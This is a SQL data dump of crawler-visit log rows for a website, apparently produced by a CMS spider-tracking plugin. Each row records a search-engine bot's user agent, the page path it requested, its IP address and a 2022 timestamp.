INSERT INTO `ey_weapp_spider_visit` VALUES ('98349', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/163.html', '216.244.66.194', '1662157991', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98350', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '58.250.125.151', '1662158379', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98351', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/437.html', '185.191.171.4', '1662158497', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98355', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/451.html', '185.191.171.44', '1662161588', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98346', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '157.55.39.5', '1662156867', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98406', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.125.109.37', '1662192328', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98353', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/78.html', '220.181.108.102', '1662160128', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98405', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/361.html', '220.181.108.158', '1662189585', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98344', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/195.html', '114.119.151.155', '1662155941', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98345', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/141.html', '220.181.108.167', '1662156855', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98335', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/225.html', '66.249.79.108', '1662147524', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98337', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '223.119.201.6', '1662148630', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98341', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_31/', '216.244.66.194', '1662152558', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98332', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/93.html', '116.179.32.69', '1662147039', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98329', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/466.html', '216.244.66.194', '1662145804', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98327', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/228.html', '66.249.79.110', '1662144908', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98342', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/330.html', '116.179.32.28', '1662153583', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98343', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '111.249.217.97', '1662155850', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98328', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/bzs.html', '114.119.151.155', '1662145370', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98325', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/about/', '66.249.79.108', '1662144333', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98334', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_2/', '185.191.171.3', '1662147369', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98336', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/dls.html', '114.119.151.155', '1662147906', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98323', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/90.html', '116.179.32.151', '1662143766', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98367', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/baiyin.html', '114.119.151.153', '1662169720', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98365', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/98_5.html', '185.191.171.21', '1662167342', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98326', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/index.php', '66.249.79.108', '1662144526', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98354', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/16_7.html', '185.191.171.39', '1662161089', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98361', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/', '66.249.79.112', '1662164404', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98338', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/34.html', '185.191.171.21', '1662149034', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98333', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1662147211', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98319', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/ta.html', '114.119.151.153', '1662142067', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98311', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bcxw/list_19_2/', '114.119.151.153', '1662139399', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98308', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/zqs.html', '114.119.151.155', '1662138103', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98307', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/198.html', '114.119.151.153', '1662137803', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98309', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_70/', '185.191.171.35', '1662138214', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98306', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/498.html', '66.249.79.110', '1662137286', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98301', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_9/', '185.191.171.2', '1662136646', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98375', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/hechi.html', '114.119.151.153', '1662171389', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98377', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/320.html', '220.181.108.94', '1662173219', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98303', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/products/335.html', '157.55.39.117', '1662136920', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98298', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/', '114.119.151.153', '1662134413', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98295', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '116.179.32.205', '1662133053', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98299', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/', '66.249.79.110', '1662135276', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98294', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/161.html', '114.119.151.155', '1662132247', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98291', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/364.html', '116.179.32.139', '1662130674', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98302', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/bc/', '66.249.79.112', '1662136742', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98287', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/16_5.html', '185.191.171.22', '1662128867', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98284', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/366.html', '220.181.108.94', '1662124130', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98289', '4', 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36; 360spider', '/', '42.236.10.81', '1662129546', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98285', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1662125993', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98280', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/423.html', '66.249.79.112', '1662122528', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98374', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.20.80', '1662171331', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98279', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/77.html', '66.249.79.110', '1662121601', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98313', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/17.html', '114.119.151.155', '1662140364', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98272', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/gds.html', '114.119.151.155', '1662113832', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98274', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/177_2.html', '185.191.171.44', '1662114516', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98269', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/tonghua.html', '114.119.151.155', '1662113221', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98270', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_27/', '114.119.151.155', '1662113407', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98314', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/378.html', '220.181.108.147', '1662140491', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98256', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact', '66.249.79.112', '1662111071', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98252', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/products/328.html', '157.55.39.153', '1662110007', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98318', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/yichunshi.html', '114.119.151.155', '1662141279', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98368', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/360.html', '116.179.32.222', '1662169947', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98321', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bcwd/', '185.191.171.10', '1662143427', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98266', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/changzhoushi.html', '114.119.151.153', '1662112424', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98240', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/121.html', '66.249.79.108', '1662099686', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98235', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/bengche/', '66.249.79.110', '1662096626', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98234', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tuobeng/', '66.249.79.108', '1662096579', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98322', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/syss.html', '114.119.151.153', '1662143695', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98324', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/101.html', '114.119.151.155', '1662143858', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98228', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tb/', '66.249.79.108', '1662096412', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98320', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/205.html', '185.191.171.20', '1662142277', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98225', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tb/', '66.249.79.110', '1662096305', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98223', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1662096245', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98296', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/367.html', '116.179.32.235', '1662133947', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98300', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/blj/', '66.249.79.108', '1662136008', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98378', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/ga.html', '114.119.151.155', '1662173547', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98416', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljxw/list_18_6/', '162.55.86.60', '1662194543', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98222', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/348.html', '66.249.79.108', '1662096096', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98224', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/bengche/', '66.249.79.112', '1662096304', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98310', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/374.html', '185.191.171.36', '1662138754', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98316', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1662140973', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98218', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/case/55.html', '220.181.108.80', '1662094673', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98213', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_9.html', '185.191.171.24', '1662091658', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98220', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/368.html', '66.249.79.108', '1662095993', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98212', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/19.html', '185.191.171.25', '1662091153', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98219', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '61.135.159.157', '1662095862', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98227', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/bc/', '66.249.79.110', '1662096395', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98229', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/buliaoji/', '66.249.79.108', '1662096464', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98230', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/bc/', '66.249.79.110', '1662096481', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98202', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/90.html', '116.179.32.153', '1662084855', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98203', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/contact/', '114.119.151.153', '1662086073', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98200', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_13.html', '185.191.171.39', '1662083146', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98201', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/60.html?tagid=60', '185.191.171.38', '1662083418', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98199', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bljwd/list_20_3/', '114.119.151.155', '1662082785', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98198', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/345.html', '157.55.39.117', '1662082552', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98204', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_17.html', '185.191.171.34', '1662086198', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98193', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/201.html', '185.191.171.39', '1662079020', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98211', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_19/', '216.244.66.194', '1662088369', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98221', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/230.html', '66.249.79.108', '1662096035', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98192', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/334.html', '66.249.79.108', '1662078053', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98226', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/buliaoji/', '66.249.79.110', '1662096377', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98195', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/47.html', '185.191.171.18', '1662079369', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98210', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/415.html', '216.244.66.194', '1662088196', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98206', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.110', '1662086471', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98214', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/290.html', '66.249.79.112', '1662093271', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98216', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/214.html', '66.249.79.110', '1662093517', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98315', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/bds.html', '114.119.151.155', '1662140897', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98189', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/18.html', '185.191.171.12', '1662076970', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98188', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '157.55.39.5', '1662076677', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98233', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/blj/', '66.249.79.110', '1662096563', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98190', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/list_4_2', '185.191.171.26', '1662077288', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98231', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/blj/', '66.249.79.108', '1662096531', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98232', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/150.html', '17.121.114.26', '1662096548', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98185', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/225.html', '66.249.79.112', '1662075890', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98180', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/440.html', '114.119.151.155', '1662075039', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98179', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/295.html', '220.181.108.91', '1662075037', '0');
